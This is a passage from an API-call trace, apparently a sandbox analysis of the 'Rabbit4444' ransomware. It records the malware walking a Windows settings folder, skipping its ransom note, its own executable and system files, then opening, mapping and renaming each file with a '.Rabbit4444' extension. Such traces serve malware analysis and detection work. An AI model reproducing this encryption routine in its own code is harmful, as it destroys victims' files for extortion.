(lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="boot") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.515] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.515] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms") returned="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms" [0057.516] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.516] lstrlenW (lpString="AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms") returned 65 [0057.516] lstrlenW (lpString="Rabbit4444") returned 10 [0057.516] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.516] lstrlenW (lpString=".dll") returned 4 [0057.516] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.516] lstrlenW (lpString=".lnk") returned 4 [0057.516] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.516] lstrlenW (lpString=".ini") returned 4 [0057.516] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.516] lstrlenW (lpString=".sys") returned 4 [0057.516] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows7.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.516] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.516] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14882711615) returned 1 [0057.516] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1291) returned 1 [0057.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.517] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.517] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.644] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.645] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.645] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14895621093) returned 1 [0057.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.646] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.646] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.646] CloseHandle (hObject=0x298) returned 1 [0057.646] CloseHandle (hObject=0x278) returned 1 [0057.646] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms.Rabbit4444") returned 193 [0057.646] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows7.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows7.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.647] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2e4b5d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f2e4b5d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", cAlternateFileName="AA1FF5~1.SET")) returned 1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2=".") returned 1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="..") returned 1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="windows") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="boot") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.647] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.647] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms") returned="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms" [0057.647] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.648] lstrlenW (lpString="AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms") returned 65 [0057.648] lstrlenW (lpString="Rabbit4444") returned 10 [0057.648] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.648] lstrlenW (lpString=".dll") returned 4 [0057.648] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.648] lstrlenW (lpString=".lnk") returned 4 [0057.648] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.648] lstrlenW (lpString=".ini") returned 4 [0057.648] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.648] lstrlenW (lpString=".sys") returned 4 [0057.648] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.648] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.648] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14895906778) returned 1 [0057.648] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1291) returned 1 [0057.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.648] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.650] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.652] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14896248452) returned 1 [0057.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.652] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.652] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.652] CloseHandle (hObject=0x298) returned 1 [0057.652] CloseHandle (hObject=0x278) returned 1 [0057.652] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms.Rabbit4444") returned 193 [0057.652] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.653] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f37d4c6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f37d4c6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", cAlternateFileName="AAC183~1.SET")) returned 1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2=".") returned 1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="..") returned 1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="windows") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="boot") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.653] lstrcmpiW (lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.653] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms") returned="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms" [0057.653] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.654] lstrlenW (lpString="AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms") returned 67 [0057.654] lstrlenW (lpString="Rabbit4444") returned 10 [0057.654] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.654] lstrlenW (lpString=".dll") returned 4 [0057.654] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.654] lstrlenW (lpString=".lnk") returned 4 [0057.654] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.654] lstrlenW (lpString=".ini") returned 4 [0057.654] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.654] lstrlenW (lpString=".sys") returned 4 [0057.654] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8_1.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.654] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.654] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14896510172) returned 1 [0057.654] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1303) returned 1 [0057.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.654] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.655] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.656] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.657] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.657] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14896784730) returned 1 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.657] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.657] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.657] CloseHandle (hObject=0x298) returned 1 [0057.657] CloseHandle (hObject=0x278) returned 1 [0057.657] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms.Rabbit4444") returned 195 [0057.658] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8_1.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_misc_rollbackyourpc_windows8_1.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.658] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f652136, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f652136, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", cAlternateFileName="AABC3F~1.SET")) returned 1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.658] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.659] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.659] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.659] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.659] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms") returned="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms" [0057.659] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.659] lstrlenW (lpString="AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms") returned 65 [0057.659] lstrlenW (lpString="Rabbit4444") returned 10 [0057.659] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.659] lstrlenW (lpString=".dll") returned 4 [0057.659] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.659] lstrlenW (lpString=".lnk") returned 4 [0057.659] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.659] lstrlenW (lpString=".ini") returned 4 [0057.659] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.659] lstrlenW (lpString=".sys") returned 4 [0057.659] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_aerosnapenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.660] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.660] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14897030600) returned 1 [0057.660] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1273) returned 1 [0057.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.660] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.661] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 